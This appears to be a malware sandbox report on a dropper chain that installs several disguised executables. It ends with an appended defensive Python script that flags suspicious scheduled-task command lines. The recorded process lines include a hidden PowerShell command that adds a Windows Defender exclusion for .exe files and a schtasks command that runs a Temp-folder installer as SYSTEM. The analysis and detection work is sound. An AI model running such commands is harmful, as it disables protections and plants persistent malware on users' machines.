Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dsound.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exe Static file information: File size 1957376 > 1048576
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1dd400
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: msvcp71.pdbx# source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb source: file.exe
Source: Binary string: BitLockerToGo.pdb source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp71.pdb source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb4 source: file.exe
Source: Binary string: BitLockerToGo.pdbGCTL source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: Y-Cleaner.exe.9.dr Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_00418320
Source: Ifh3vuF2SF2LvHombSP7ZGRi.exe.3.dr Static PE information: section name: .symtab
Source: Channel2[1].exe.3.dr Static PE information: section name: .eh_fram
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe.3.dr Static PE information: section name: .eh_fram
Source: setup[1].exe.3.dr Static PE information: section name: .sxdata
Source: Jrh6BLxH1aqS3cJle2sY_F2Q.exe.3.dr Static PE information: section name: .sxdata
Source: CheckTool[1].exe.3.dr Static PE information: section name: .symtab
Source: IZImiIFXXrvtVOHFozZW.dll.6.dr Static PE information: section name: .eh_fram
Source: service123.exe.6.dr Static PE information: section name: .eh_fram
Source: Install.exe.8.dr Static PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_030225A1 push eax; retn 0071h 0_2_030225A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00567230 push ecx; ret 3_2_00567243
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004065B8 push 004065F5h; ret 7_2_004065ED
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004040B5 push eax; ret 7_2_004040F1
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00408104 push ecx; mov dword ptr [esp], eax 7_2_00408109
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404185 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404206 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_0040C218 push eax; ret 7_2_0040C219
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_004042E8 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00404283 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Code function: 7_2_00408F38 push 00408F6Bh; ret 7_2_00408F63
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00411360 push ecx; mov dword ptr [esp], ecx 8_2_00411361
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00413954 push eax; ret 8_2_00413972
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_00413CC0 push eax; ret 8_2_00413CEE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042D822 push eax; retf 9_2_0042D859
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042A0F5 push esi; ret 9_2_0042A0FE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0040D26E push ecx; ret 9_2_0040D281
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0042C41E pushad ; retf 9_2_0042C445
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_1000E891 push ecx; ret 9_2_1000E8A4
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004AD8D0 push eax; retf 004Ah 9_2_004AD99D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004B80B1 pushad ; ret 9_2_004B80B5
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DCB5F push esp; retf 9_2_020DCB67
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DD15D push esp; retf 9_2_020DD15E
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020CD4D5 push ecx; ret 9_2_020CD4E8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00409954 push 00409991h; ret 11_2_00409989
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0040A04F push ds; ret 11_2_0040A050
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0040A023 push ds; ret 11_2_0040A04D
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00460088 push ecx; mov dword ptr [esp], ecx 11_2_0046008C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004062CC push ecx; mov dword ptr [esp], eax 11_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0049467C push ecx; mov dword ptr [esp], ecx 11_2_00494681
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004106E0 push ecx; mov dword ptr [esp], edx 11_2_004106E5
Source: file.exe Static PE information: section name: .text entropy: 7.999695640081768
Source: univ[1].exe.3.dr Static PE information: section name: .text entropy: 7.808776511715382
Source: tyq3dazbB0crObgKIDGLxiAO.exe.3.dr Static PE information: section name: .text entropy: 7.808776511715382
Source: Y-Cleaner.exe.9.dr Static PE information: section name: .text entropy: 7.918511524700298

Persistence and Installation Behavior

Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_RegDLL.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\uninstall\is-R79QI.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Channel2[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-75FQC.tmp
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\IZImiIFXXrvtVOHFozZW.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-O04L0.tmp
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File created: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\stories[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-IKU3H.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\libeay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\univ[1].exe
Source: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe File created: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\ssleay32.dll (copy)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Temp\is-8OGEE.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\msvcp71.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\msvcr71.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\CheckTool[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\Qt5OpenGL.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-86R9G.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe File created: C:\Users\user\AppData\Local\Temp\7zS1DF8.tmp\Install.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-5ANFC.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\is-IVTOI.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\hI6pMK6rYY2urO_lpGyU85DA.exe File created: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp File created: C:\Users\user\AppData\Local\Play Glock\libssl-1_1.dll (copy) Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] Jump to dropped file
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe File created: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\dll[1] Jump to dropped file
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] Jump to dropped file

Boot Survival

Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe File created: C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job
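The schtasks command line above is the persistence and privilege step of this chain: Install.exe re-launches itself from a Temp folder as SYSTEM via a one-shot, force-created, /V1 (legacy .job format) task, which is why the .job file then appears under C:\Windows\Tasks. As an added example that is not part of this report, the Python triage routine below parses schtasks /CREATE command lines such as the one recorded here and flags the traits the "Suspicious Scheduled Task Creation Involving Temp Folder" detection keys on. The first sample is the command line from the report; the benign and borderline samples, the weights, the threshold and the random-name heuristic are constructed assumptions for the example, not a published scoring scheme.

```python
"""Triage schtasks /CREATE command lines for the traits seen in this report.

Added example, not part of the sandbox report. Only the first sample is the
command line recorded in the report; the other two are constructed for contrast.
"""
import shlex

SAMPLE_CMDLINES = [
    # Recorded in this report: Install.exe creating its SYSTEM-level task.
    r'schtasks /CREATE /TN "bMvfdBTccYfZYKRCwN" /SC once /ST 18:54:00 /RU "SYSTEM" '
    r'/TR "\"C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe\" Is /mKdidL 385121 /S" /V1 /F',
    # Constructed: a plausible benign task created by a normal installer.
    r'schtasks /CREATE /TN "Backup\NightlyBackup" /SC daily /ST 02:00 '
    r'/TR "\"C:\Program Files\Backup\backup.exe\" --full"',
    # Constructed: borderline, Temp-folder binary but no SYSTEM account or force flag.
    r'schtasks /CREATE /TN "UpdateCheck" /SC once /ST 12:00 /TR "C:\Users\user\AppData\Local\Temp\upd.exe"',
]

TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\temp\\")
SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}
# Assumed weights, tuned by hand for this example.
WEIGHTS = {
    "temp_path": 3,        # action binary lives under a Temp directory
    "runs_as_system": 2,   # /RU SYSTEM: the task runs with full privileges
    "random_name": 2,      # machine-generated looking task name
    "one_shot": 1,         # /SC once: a single run, typical for staged installers
    "force_overwrite": 1,  # /F: silently replace an existing task of that name
    "legacy_job_file": 1,  # /V1: XP-compatible task stored as C:\Windows\Tasks\<name>.job
}
SUSPICIOUS_THRESHOLD = 5


def parse_schtasks(cmdline):
    """Tokenise a schtasks command line into {option: value} plus bare flags.

    shlex's POSIX rules turn the backslash-escaped quotes inside the /TR value
    back into plain quotes while leaving ordinary path backslashes untouched.
    """
    tokens = shlex.split(cmdline)
    opts, flags = {}, set()
    i = 1  # skip the program name
    while i < len(tokens):
        name = tokens[i].upper()
        if name.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[name] = tokens[i + 1]
            i += 2
        else:
            if name.startswith("/"):
                flags.add(name)
            i += 1
    return opts, flags


def action_executable(tr_value):
    """Return the program path from a /TR value (quoted path or first token)."""
    tr_value = tr_value.strip()
    if tr_value.startswith('"'):
        end = tr_value.find('"', 1)
        return tr_value[1:end] if end > 0 else tr_value[1:]
    return tr_value.split(" ", 1)[0]


def looks_random(task_name):
    """Heuristic (assumption): long, single-token, mixed-case names with almost no vowels."""
    leaf = task_name.rsplit("\\", 1)[-1]
    if len(leaf) < 12 or not leaf.isalnum():
        return False
    vowels = sum(ch in "aeiouAEIOU" for ch in leaf)
    mixed_case = leaf != leaf.lower() and leaf != leaf.upper()
    return mixed_case and vowels / len(leaf) < 0.2


def triage(cmdline):
    """Score one schtasks /CREATE command line; returns None for other verbs."""
    opts, flags = parse_schtasks(cmdline)
    if "/CREATE" not in flags:
        return None
    task = opts.get("/TN", "")
    exe = action_executable(opts.get("/TR", ""))
    findings = {
        "task_name": task,
        "executable": exe,
        "temp_path": any(d in exe.lower() for d in TEMP_DIRS),
        "runs_as_system": opts.get("/RU", "").strip().upper() in SYSTEM_ACCOUNTS,
        "random_name": looks_random(task),
        "one_shot": opts.get("/SC", "").lower() == "once",
        "force_overwrite": "/F" in flags,
        # /V1 tasks are stored as legacy .job files, which is where the report
        # sees C:\Windows\Tasks\bMvfdBTccYfZYKRCwN.job appear.
        "legacy_job_file": "C:\\Windows\\Tasks\\" + task + ".job" if "/V1" in flags else None,
    }
    findings["score"] = sum(w for key, w in WEIGHTS.items() if findings[key])
    findings["suspicious"] = findings["score"] >= SUSPICIOUS_THRESHOLD
    return findings


def triage_all(cmdlines=SAMPLE_CMDLINES):
    """Triage every command line in the list, preserving order."""
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all():
        verdict = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f'{verdict:10} score={result["score"]:2} task={result["task_name"]!r} exe={result["executable"]}')
```

On the report's command line every indicator fires (Temp-folder binary, SYSTEM account, vowel-free mixed-case name, once, /F, /V1), while the constructed daily backup task scores nothing and the Temp-folder-only task stays below the threshold. When hunting, feed the function the command lines from process-creation telemetry (Sysmon event ID 1 or Security 4688) and pivot from any /V1 hit to the corresponding .job file under C:\Windows\Tasks.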
